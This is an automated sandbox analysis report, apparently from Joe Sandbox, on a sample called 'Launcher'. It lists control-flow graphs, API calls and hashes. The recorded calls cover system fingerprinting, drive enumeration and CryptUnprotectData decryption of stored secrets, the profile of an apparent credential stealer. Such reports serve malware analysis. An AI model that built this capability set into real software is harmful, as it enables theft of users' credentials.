19599->19604 19605 422590 19604->19605 19605->19605 19606 4400e0 LdrInitializeThunk 19605->19606 19607 4226af 19606->19607 19444 4389d0 19446 438a40 CoCreateInstance 19444->19446 19447 438b1a SysAllocString 19446->19447 19448 438f56 19446->19448 19451 438bc7 19447->19451 19450 438f66 GetVolumeInformationW 19448->19450 19458 438f7d 19450->19458 19452 438f45 SysFreeString 19451->19452 19453 438bcf CoSetProxyBlanket 19451->19453 19452->19448 19454 438f3b 19453->19454 19455 438bef SysAllocString 19453->19455 19454->19452 19457 438ce0 19455->19457 19457->19457 19459 438d14 SysAllocString 19457->19459 19461 438d37 19459->19461 19460 438f25 SysFreeString SysFreeString 19460->19454 19461->19460 19462 438f14 19461->19462 19463 438d7b VariantInit 19461->19463 19462->19460 19465 438de0 19463->19465 19464 438f03 VariantClear 19464->19462 19465->19464 19466 40d293 CoInitializeSecurity 19608 42e434 19610 42e446 19608->19610 19609 42e4f5 GetPhysicallyInstalledSystemMemory 19611 42e519 19609->19611 19610->19609 19610->19610 19467 42dd55 19468 42dd74 19467->19468 19469 42de60 GetComputerNameExA 19468->19469 19470 42deb0 GetComputerNameExA 19469->19470 19472 42df90 19470->19472 19612 40dcff 19614 40dd90 19612->19614 19613 40ddde 19614->19613 19616 43d920 LdrInitializeThunk 19614->19616 19616->19613

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 4389d0-438a34 1 438a40-438a9b 0->1 1->1 2 438a9d-438ab9 1->2 4 438ac6-438b14 CoCreateInstance 2->4 5 438abb 2->5 6 438f56-438f7b call 43f550 GetVolumeInformationW 4->6 7 438b1a-438b5b 4->7 5->4 12 438f85-438f87 6->12 13 438f7d-438f81 6->13 8 438b60-438b9c 7->8 8->8 10 438b9e-438bc9 SysAllocString 8->10 18 438f45-438f52 SysFreeString 10->18 19 438bcf-438be9 CoSetProxyBlanket 10->19 15 438f9f-438fa6 12->15 13->12 16 438fb2-438fff call 41f900 15->16 17 438fa8-438faf 15->17 25 439000-43900b 16->25 17->16 18->6 21 438f3b-438f41 19->21 22 438bef-438c08 19->22 21->18 24 438c10-438c4d 22->24 24->24 26 438c4f-438cd5 SysAllocString 24->26 25->25 27 43900d-439019 25->27 28 438ce0-438d12 26->28 29 438f90-438f99 27->29 30 43901f-43902f call 408400 27->30 28->28 31 438d14-438d39 SysAllocString 28->31 29->15 33 439034-43903b 29->33 30->29 36 438f25-438f37 SysFreeString * 2 31->36 37 438d3f-438d61 31->37 36->21 39 438d67-438d6a 37->39 40 438f1b-438f21 37->40 39->40 41 438d70-438d75 39->41 40->36 41->40 42 438d7b-438dd1 VariantInit 41->42 43 438de0-438e1c 42->43 43->43 44 438e1e-438e33 43->44 45 438e37-438e39 44->45 46 438f03-438f14 VariantClear 45->46 47 438e3f-438e45 45->47 46->40 47->46 48 438e4b-438e58 47->48 50 438e5a-438e5f 48->50 51 438e9d 48->51 53 438e7c-438e80 50->53 52 438e9f-438ec6 call 408380 call 42ec40 51->52 64 438ec8 52->64 65 438ecd-438edd 52->65 55 438e82-438e8b 53->55 56 438e70 53->56 59 438e92-438e96 55->59 60 438e8d-438e90 55->60 58 438e71-438e7a 56->58 58->52 58->53 59->58 61 438e98-438e9b 59->61 60->58 61->58 64->65 66 438ee4-438f00 call 4083b0 call 408390 65->66 67 438edf 65->67 66->46 67->66
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00443678,00000000,00000001,00443668,00000000), ref: 00438B0C
                                                                        • SysAllocString.OLEAUT32(79CB7BB2), ref: 00438BA3
                                                                        • CoSetProxyBlanket.COMBASE(00006F68,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438BE1
                                                                        • SysAllocString.OLEAUT32(79CB7BB2), ref: 00438C50
                                                                        • SysAllocString.OLEAUT32(79CB7BB2), ref: 00438D15
                                                                        • VariantInit.OLEAUT32(?), ref: 00438D80
                                                                        • VariantClear.OLEAUT32(?), ref: 00438F04
                                                                        • SysFreeString.OLEAUT32(?), ref: 00438F2F
                                                                        • SysFreeString.OLEAUT32(?), ref: 00438F35
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00438F46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                        • String ID: !_2Y$"S#M$9]j]$;OnI$C$I'Y!$T#]]$\$q]j]$tW(Q$tw$x[
                                                                        • API String ID: 2485776651-621965088
                                                                        • Opcode ID: 9396cb8f17d18c9f60335c4eb3dae25d3e470e3c7ae8411d7b2ccb259684225f
                                                                        • Instruction ID: 78e83211301507079be73e4fe13c709d001eec66ed3dbdc862d3520982de3262
                                                                        • Opcode Fuzzy Hash: 9396cb8f17d18c9f60335c4eb3dae25d3e470e3c7ae8411d7b2ccb259684225f
                                                                        • Instruction Fuzzy Hash: 4EF10EB2A083009BD310DF65C885B5BFBE5EFC9704F148A2DF5959B290D778D906CB86

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 209 418be3-418bf7 call 408390 212 418bfd-418c02 209->212 213 418cbe 209->213 214 418cc5-418d29 call 408380 212->214 213->214 217 418d30-418d98 214->217 217->217 218 418d9a-418da6 217->218 219 418dc1-418dd1 218->219 220 418da8-418daf 218->220 222 418df1-418e15 call 43ff30 219->222 223 418dd3-418dda 219->223 221 418db0-418dbf 220->221 221->219 221->221 227 418e40-418e62 call 440280 222->227 228 418ee0-418efa 222->228 229 418e22-418e28 call 408390 222->229 230 418ea5 222->230 231 418e69-418e89 call 408380 call 440350 222->231 232 418eab-418eb1 call 408390 222->232 233 418e31 222->233 234 418eb4-418eb6 222->234 235 418e37-418e3d call 408390 222->235 236 418ed7-418edd call 408390 222->236 237 418ebb-418ecf call 401000 222->237 238 418e9d 222->238 239 418e1c 222->239 224 418de0-418def 223->224 224->222 224->224 227->228 227->231 227->236 227->237 227->238 244 418f00-418f26 228->244 229->233 230->232 263 418e8e-418e96 231->263 232->234 233->235 243 41c6fc-41c703 234->243 235->227 236->228 237->236 238->230 239->229 244->244 252 418f28-418f30 244->252 258 418f32-418f41 252->258 259 418f7a-418fe3 call 401940 252->259 261 418f50-418f57 258->261 273 418ff0-419030 259->273 264 418f60-418f66 261->264 265 418f59-418f5c 261->265 263->228 263->236 263->237 263->238 267 419060-419062 263->267 268 419240 263->268 269 419252-4192d1 263->269 264->259 272 418f68-418f77 call 43d920 264->272 265->261 271 418f5e 265->271 274 419070-419076 267->274 278 419246-41924f call 408390 268->278 270 4192e0-41935a 269->270 270->270 275 41935c-41937a call 401a80 270->275 271->259 272->259 273->273 277 419032-419059 call 401a80 273->277 274->274 279 419078-4190a0 274->279 292 419381-41938d 275->292 293 419394-4193ef 275->293 277->267 277->268 277->269 278->269 284 4190a2-4190a5 279->284 285 4190a7 279->285 284->285 286 4190a8-4190b4 284->286 285->286 290 4190b6-4190b9 286->290 291 4190bb 286->291 290->291 294 4190bc-4190d6 call 408380 290->294 291->294 292->269 292->278 292->292 292->293 295 4193f0-419415 293->295 300 4191da-419239 call 43f550 CryptUnprotectData 294->300 301 4190dc-4190e3 294->301 295->295 297 419417-41943b call 401ab0 295->297 304 419720 297->304 305 4197a0 297->305 306 419540-419549 call 408390 297->306 307 419442-419481 297->307 308 4196c7-4196fe call 41df00 297->308 309 419726-41972e 297->309 310 419706-41970f call 408390 297->310 311 41976b-419773 297->311 312 41954c-41955c 297->312 313 41952e 297->313 314 4196b3-4196c0 297->314 315 419515-419525 call 401bb0 297->315 316 419534-419539 297->316 317 419574-41958b call 401af0 297->317 300->228 300->231 300->236 300->237 300->238 300->267 300->268 300->269 303 419100-419146 call 41ed80 * 2 301->303 356 4190f0-4190fa 303->356 357 419148-419163 call 41ed80 303->357 305->243 306->312 323 419490-4194aa 307->323 308->310 320 419751-419756 309->320 321 419730-419734 309->321 310->304 324 419760 311->324 325 419775-419779 311->325 327 41955d-41956d call 401ae0 312->327 313->316 314->304 314->305 314->306 314->308 314->309 314->310 314->311 314->312 314->313 315->313 316->327 342 4195e0 317->342 343 41958d-419592 317->343 320->311 334 419740-41974f 321->334 323->323 336 4194ac-419511 call 41df00 323->336 324->311 337 419780-41978f 325->337 327->304 327->305 327->306 327->308 327->309 327->310 327->311 327->312 327->313 327->314 327->315 327->317 334->320 334->334 336->315 337->337 346 419791 337->346 349 4195e2-4195ea 342->349 348 4195a9-4195b7 343->348 346->324 352 4195a0 348->352 353 4195b9-4195bb 348->353 354 419600 349->354 355 4195ec-4195f1 349->355 358 4195a1-4195a7 352->358 353->352 359 4195bd-4195c8 353->359 360 419607-41962b call 408380 call 40ad30 354->360 355->360 356->300 356->303 357->356 367 419165-41918e 357->367 358->348 358->349 359->352 362 4195ca-4195d3 359->362 373 419631-419646 call 408380 360->373 374 41962d-41962f 360->374 362->358 365 4195d5-4195d8 362->365 365->358 369 419194-4191aa call 41ed80 367->369 370 4190e9-4190ef 367->370 377 4191b0-4191d5 369->377 378 4190e5 369->378 370->356 380 419661-419673 373->380 381 419648-41964f 373->381 374->373 377->356 378->370 383 419691-41969f call 4400e0 380->383 384 419675-419678 380->384 382 419650-41965f 381->382 382->380 382->382 387 4196a4-4196ac 383->387 385 419680-41968f 384->385 385->383 385->385 387->304 387->305 387->306 387->308 387->309 387->310 387->311 387->312 387->313 387->314
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$7654$??;4$^$z
                                                                        • API String ID: 0-2567570624
                                                                        • Opcode ID: 9ec0e6aff255a45d3c2ce9d53ddb9f719d78b7d2f6d3ba07001a99e0c1e98cf1
                                                                        • Instruction ID: b1bab82a719bfbb6248ae59022c6f20018a5e48ecd229fcddef7335a908d3544
                                                                        • Opcode Fuzzy Hash: 9ec0e6aff255a45d3c2ce9d53ddb9f719d78b7d2f6d3ba07001a99e0c1e98cf1
                                                                        • Instruction Fuzzy Hash: 234204B5A083418BD724CF24D8517EBB7E2EFCA304F08492EE4C987391E7399955CB5A

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 388 408ae0-408af1 call 43c680 391 408d34-408d36 ExitProcess 388->391 392 408af7-408b0f SHGetSpecialFolderPathW call 435ea0 388->392 395 408b15-408b4a GetCurrentThreadId GetCurrentProcessId 392->395 396 408d2f call 43d860 392->396 397 408b54-408c76 GetForegroundWindow 395->397 398 408b4c-408b52 395->398 396->391 400 408d0b-408d23 call 40a0f0 397->400 401 408c7c-408ced 397->401 398->397 400->396 406 408d25 call 40d260 400->406 402 408cf3-408d09 401->402 403 408cef-408cf1 401->403 402->400 403->402 408 408d2a call 40bf10 406->408 408->396
                                                                        APIs
                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B02
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00408B15
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00408B1D
                                                                        • GetForegroundWindow.USER32 ref: 00408C6E
                                                                        • ExitProcess.KERNEL32 ref: 00408D36
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                        • String ID:
                                                                        • API String ID: 4063528623-0
                                                                        • Opcode ID: e99b9c22fb25575f9126c025eed0440529ca7e6e2d35627aad7f0ff0fd22502f
                                                                        • Instruction ID: 3916312ac2da3a89c62ac9926c891368b4596cef17ec7d1c1499a6de1a4fdd47
                                                                        • Opcode Fuzzy Hash: e99b9c22fb25575f9126c025eed0440529ca7e6e2d35627aad7f0ff0fd22502f
                                                                        • Instruction Fuzzy Hash: 67510473B5471447C708EEBE9D8139AB6D39BC8610F0E853DA888DB395ED789C0946C9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 414 424470-4244cf 415 4244d0-424532 414->415 415->415 416 424534-424588 415->416 418 424590-4245fb 416->418 418->418 419 4245fd-42460b 418->419 420 424612-424618 419->420 421 424672-42467b 419->421 422 4247c0 419->422 423 4247b0-4247b7 419->423 424 4247c6-424885 419->424 425 424654 419->425 426 424665-424671 419->426 427 42465c-424662 call 408390 419->427 430 424621 420->430 431 42461a-42461f 420->431 428 424684 421->428 429 42467d-424682 421->429 423->422 432 424890-4248ea 424->432 425->427 427->426 435 42468b-4246cf call 408380 428->435 429->435 436 424624-42464d call 408380 430->436 431->436 432->432 437 4248ec-42490a call 4228a0 432->437 444 4246d0-42472d 435->444 436->421 436->422 436->423 436->424 436->425 436->426 436->427 447 42492d-4249f7 call 408380 437->447 444->444 445 42472f-42473a 444->445 448 424761-42476e 445->448 449 42473c-424741 445->449 457 424a00-424a14 447->457 452 424770-424774 448->452 453 424791-42479c call 4400e0 448->453 451 424750-42475f 449->451 451->448 451->451 456 424780-42478f 452->456 458 4247a1-4247a9 453->458 456->453 456->456 457->457 459 424a16-424a1e 457->459 458->422 458->423 458->424 458->447 462 424a8a-424a98 458->462 460 424a20-424a25 459->460 461 424a41-424a4e 459->461 463 424a30-424a3f 460->463 464 424a50-424a54 461->464 465 424a71-424a87 GetLogicalDrives call 4400e0 461->465 466 424a9a 462->466 467 424a9f-424b4e call 408380 462->467 463->461 463->463 468 424a60-424a6f 464->468 465->462 466->467 473 424b50-424b64 467->473 468->465 468->468 473->473 474 424b66-424b6e 473->474 475 424b70-424b75 474->475 476 424b91-424b9e 474->476 477 424b80-424b8f 475->477 478 424ba0-424ba4 476->478 479 424bc1-424bd7 GetLogicalDrives call 4400e0 476->479 477->476 477->477 480 424bb0-424bbf 478->480 480->479 480->480
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \]$KB
                                                                        • API String ID: 0-282600260
                                                                        • Opcode ID: 92c44fe8c1f774e4af65f77713d3c0eb1963ab35570d33be9f0bae4b12a83995
                                                                        • Instruction ID: 3fab9b1554da2861af45bec0a6cd50a870c70bd336575c68554a47ef3370b67c
                                                                        • Opcode Fuzzy Hash: 92c44fe8c1f774e4af65f77713d3c0eb1963ab35570d33be9f0bae4b12a83995
                                                                        • Instruction Fuzzy Hash: 58021FB66083508FD314CF68E89166BBBE5EFC5314F08892DE9D98B351E778C905CB86

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 483 42dd55-42ddb3 call 43f550 487 42ddc0-42dde4 483->487 487->487 488 42dde6-42ddef 487->488 489 42ddf1-42ddf9 488->489 490 42de0d 488->490 491 42de00-42de09 489->491 492 42de0f-42de1d 490->492 491->491 493 42de0b 491->493 494 42de1f-42de27 492->494 495 42de3d 492->495 493->492 496 42de30-42de39 494->496 497 42de3f-42deaf call 43f550 GetComputerNameExA 495->497 496->496 498 42de3b 496->498 502 42deb0-42ded3 497->502 498->497 502->502 503 42ded5-42dede 502->503 504 42dee0-42dee8 503->504 505 42defd 503->505 506 42def0-42def9 504->506 507 42deff-42df0d 505->507 506->506 508 42defb 506->508 509 42df0f-42df17 507->509 510 42df2d 507->510 508->507 512 42df20-42df29 509->512 511 42df2f-42df8b GetComputerNameExA 510->511 514 42df90-42dfb3 511->514 512->512 513 42df2b 512->513 513->511 514->514 515 42dfb5-42dfbe 514->515 516 42dfc0-42dfc8 515->516 517 42dfdd 515->517 518 42dfd0-42dfd9 516->518 519 42dfdf-42dfeb 517->519 518->518 520 42dfdb 518->520 521 42e00b-42e06f 519->521 522 42dfed-42dff3 519->522 520->519 525 42e070-42e08d 521->525 523 42e000-42e009 522->523 523->521 523->523 525->525 526 42e08f-42e098 525->526 527 42e09a 526->527 528 42e0ab-42e0b7 526->528 529 42e0a0-42e0a9 527->529 530 42e0cb-42e12a call 43f550 528->530 531 42e0b9-42e0bf 528->531 529->528 529->529 536 42e130-42e154 530->536 532 42e0c0-42e0c9 531->532 532->530 532->532 536->536 537 42e156-42e15f 536->537 538 42e161-42e169 537->538 539 42e17d 537->539 541 42e170-42e179 538->541 540 42e17f-42e18e 539->540 542 42e2b4-42e302 540->542 543 42e194-42e19b 540->543 541->541 544 42e17b 541->544 546 42e310-42e338 542->546 545 42e1a0-42e1ad 543->545 544->540 547 42e1c0-42e1c6 545->547 548 42e1af-42e1b4 545->548 546->546 549 42e33a-42e347 546->549 551 42e210-42e21c 547->551 552 42e1c8-42e1cb 547->552 550 42e1e2 548->550 553 42e35b-42e35e call 4319a0 549->553 554 42e349-42e34f 549->554 556 42e1e5-42e1f5 550->556 559 42e270-42e278 551->559 560 42e21e-42e221 551->560 552->551 555 42e1cd-42e1df 552->555 564 42e363-42e37f 553->564 557 42e350-42e359 554->557 555->550 563 42e1f7-42e1fd 556->563 557->553 557->557 561 42e282-42e285 559->561 562 42e27a-42e27d 559->562 560->559 565 42e223-42e26b 560->565 566 42e287-42e2a8 561->566 567 42e2ad-42e2af 561->567 562->563 563->542 568 42e203-42e205 563->568 565->556 566->550 567->550 568->545 569 42e207 568->569 569->542
                                                                        APIs
                                                                        • GetComputerNameExA.KERNEL32(00000006,00000000,00000200), ref: 0042DE80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ComputerName
                                                                        • String ID: .L6k$FPX&
                                                                        • API String ID: 3545744682-1030031352
                                                                        • Opcode ID: e4f428f509ff5e6cb3c19bb6ef7fce41a7fd2c9908bb1c38f3bc447a5a6f9b72
                                                                        • Instruction ID: aa173f05b44665317560c1bde112a0d19c6c7f5019f39f8cf5563b23ce8c7574
                                                                        • Opcode Fuzzy Hash: e4f428f509ff5e6cb3c19bb6ef7fce41a7fd2c9908bb1c38f3bc447a5a6f9b72
                                                                        • Instruction Fuzzy Hash: 71E1D570604B908EE725CF3694507B3BBE1AF57304F58899ED0EB8B382D7796506CB25

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 570 42dd4e-42de5b call 43f550 573 42de60-42deaf GetComputerNameExA 570->573 574 42deb0-42ded3 573->574 574->574 575 42ded5-42dede 574->575 576 42dee0-42dee8 575->576 577 42defd 575->577 578 42def0-42def9 576->578 579 42deff-42df0d 577->579 578->578 580 42defb 578->580 581 42df0f-42df17 579->581 582 42df2d 579->582 580->579 584 42df20-42df29 581->584 583 42df2f-42df8b GetComputerNameExA 582->583 586 42df90-42dfb3 583->586 584->584 585 42df2b 584->585 585->583 586->586 587 42dfb5-42dfbe 586->587 588 42dfc0-42dfc8 587->588 589 42dfdd 587->589 590 42dfd0-42dfd9 588->590 591 42dfdf-42dfeb 589->591 590->590 592 42dfdb 590->592 593 42e00b-42e06f 591->593 594 42dfed-42dff3 591->594 592->591 597 42e070-42e08d 593->597 595 42e000-42e009 594->595 595->593 595->595 597->597 598 42e08f-42e098 597->598 599 42e09a 598->599 600 42e0ab-42e0b7 598->600 601 42e0a0-42e0a9 599->601 602 42e0cb-42e12a call 43f550 600->602 603 42e0b9-42e0bf 600->603 601->600 601->601 608 42e130-42e154 602->608 604 42e0c0-42e0c9 603->604 604->602 604->604 608->608 609 42e156-42e15f 608->609 610 42e161-42e169 609->610 611 42e17d 609->611 613 42e170-42e179 610->613 612 42e17f-42e18e 611->612 614 42e2b4-42e302 612->614 615 42e194-42e19b 612->615 613->613 616 42e17b 613->616 618 42e310-42e338 614->618 617 42e1a0-42e1ad 615->617 616->612 619 42e1c0-42e1c6 617->619 620 42e1af-42e1b4 617->620 618->618 621 42e33a-42e347 618->621 623 42e210-42e21c 619->623 624 42e1c8-42e1cb 619->624 622 42e1e2 620->622 625 42e35b-42e35e call 4319a0 621->625 626 42e349-42e34f 621->626 628 42e1e5-42e1f5 622->628 631 42e270-42e278 623->631 632 42e21e-42e221 623->632 624->623 627 42e1cd-42e1df 624->627 636 42e363-42e37f 625->636 629 42e350-42e359 626->629 627->622 635 42e1f7-42e1fd 628->635 629->625 629->629 633 42e282-42e285 631->633 634 42e27a-42e27d 631->634 632->631 637 42e223-42e26b 632->637 638 42e287-42e2a8 633->638 639 42e2ad-42e2af 633->639 634->635 635->614 640 42e203-42e205 635->640 637->628 638->622 639->622 640->617 641 42e207 640->641 641->614
                                                                        APIs
                                                                        • GetComputerNameExA.KERNEL32(00000006,00000000,00000200), ref: 0042DE80
                                                                        • GetComputerNameExA.KERNEL32(00000005,00000000,00000200), ref: 0042DF4F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ComputerName
                                                                        • String ID: .L6k$FPX&
                                                                        • API String ID: 3545744682-1030031352
                                                                        • Opcode ID: e7c65ce7ee6dba4e03b97e26cea1270ebfb7e3713e142d4a7c7104a1b6d57e82
                                                                        • Instruction ID: 10d9fc797a3d32074fbf503759531678fa863e0e0eb484848d36d90dfdfb2c32
                                                                        • Opcode Fuzzy Hash: e7c65ce7ee6dba4e03b97e26cea1270ebfb7e3713e142d4a7c7104a1b6d57e82
                                                                        • Instruction Fuzzy Hash: 68E11760604B918EE725CF3684507B3FBD1AF57304F5889AED0EB8B382D739A506CB65

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 697 42e434-42e444 698 42e446-42e45b 697->698 699 42e4b9 697->699 700 42e460-42e47a 698->700 701 42e4d1-42e514 call 43f550 GetPhysicallyInstalledSystemMemory call 41f900 699->701 702 42e4bb-42e4bf 699->702 700->700 705 42e47c-42e487 700->705 712 42e519-42e53f 701->712 703 42e4c0-42e4cd 702->703 703->703 706 42e4cf 703->706 708 42e4ab-42e4b7 705->708 709 42e489-42e491 705->709 706->701 708->699 711 42e4a0-42e4a9 709->711 711->708 711->711 713 42e540-42e593 712->713 713->713 714 42e595-42e5bf 713->714 715 42e5c0-42e5da 714->715 715->715 716 42e5dc-42e5e5 715->716 717 42e5e7-42e5ed 716->717 718 42e5fd 716->718 719 42e5f0-42e5f9 717->719 720 42e600-42e608 718->720 719->719 723 42e5fb 719->723 721 42e60a-42e60b 720->721 722 42e61b-42e627 720->722 724 42e610-42e619 721->724 725 42e63b-42e67b 722->725 726 42e629-42e62f 722->726 723->720 724->722 724->724 728 42e680-42e69a 725->728 727 42e630-42e639 726->727 727->725 727->727 728->728 729 42e69c-42e6a5 728->729 730 42e6a7-42e6af 729->730 731 42e6bb-42e6c4 729->731 732 42e6b0-42e6b9 730->732 733 42e6c6-42e6c9 731->733 734 42e6db-42e75f 731->734 732->731 732->732 735 42e6d0-42e6d9 733->735 735->734 735->735
                                                                        APIs
                                                                        • GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0042E4FC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                        • String ID: o|Nx
                                                                        • API String ID: 3960555810-802042616
                                                                        • Opcode ID: 55090ea056dc510aa62f610828e46d5bdb31a3fa47c9b38dc9210595f8b174c3
                                                                        • Instruction ID: f503bf91390e6fbe3390ce4816fb64252292ae4852dd66876ced69c528ecd60c
                                                                        • Opcode Fuzzy Hash: 55090ea056dc510aa62f610828e46d5bdb31a3fa47c9b38dc9210595f8b174c3
                                                                        • Instruction Fuzzy Hash: B291D970508B918FD725CF3A94607A3BBE1AF53304F5849AEC0DB87782D779A40ACB54
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043D8EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 6f68be6ec956a6583a85b5b43e644dfcdb69abe17a7243014ccb1c04c9939d51
                                                                        • Instruction ID: 0b3d3b0c0615522f10db29576abadf12e02e27a3a625570a85f481a160202f54
                                                                        • Opcode Fuzzy Hash: 6f68be6ec956a6583a85b5b43e644dfcdb69abe17a7243014ccb1c04c9939d51
                                                                        • Instruction Fuzzy Hash: FD0128B1E062018BD318AF75EC51B2BB766EFCA300F08993DE98193241E638D8558796
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(00411AA3), ref: 0043D94E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: @
                                                                        • API String ID: 2994545307-2766056989
                                                                        • Opcode ID: 0475917a1a8bbe351991b2093614af9c6e3f5bd09f22263d332902a3f21969f9
                                                                        • Instruction ID: 4b259642c4a6d7a99f9af5d21d433992198207b2e4a927d98d07ded2539b41dd
                                                                        • Opcode Fuzzy Hash: 0475917a1a8bbe351991b2093614af9c6e3f5bd09f22263d332902a3f21969f9
                                                                        • Instruction Fuzzy Hash: 6631FF716083048BD314DF68D8C1A6BFBF4FF8A304F15892DE68987391E7789918CB5A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e2e4a7a582348601e141d1a64f92d77e41cde39af5ebceb16fd8896977840cd7
                                                                        • Instruction ID: ad44c87781cf1a8a43f37b6594503ed622ccc9cc0f27c007faec6592b3e66a25
                                                                        • Opcode Fuzzy Hash: e2e4a7a582348601e141d1a64f92d77e41cde39af5ebceb16fd8896977840cd7
                                                                        • Instruction Fuzzy Hash: 3E7106756043419BEB15EF28C850A2FB3E2FFC9350F19C42DE6858B356E738D861978A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 227b3ff5576315b635a7910336eeac6758ebc8b89ea0154b3321cb937fa4b268
                                                                        • Instruction ID: fd94310adb4de760c7d7c3a3ca757dfebc471b0dc2fb50c609f975835bcd1d9b
                                                                        • Opcode Fuzzy Hash: 227b3ff5576315b635a7910336eeac6758ebc8b89ea0154b3321cb937fa4b268
                                                                        • Instruction Fuzzy Hash: F7514B76A0D3009FE310DF65EC8175BB7E5EB86314F04853DF68487281E779990ACB9A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
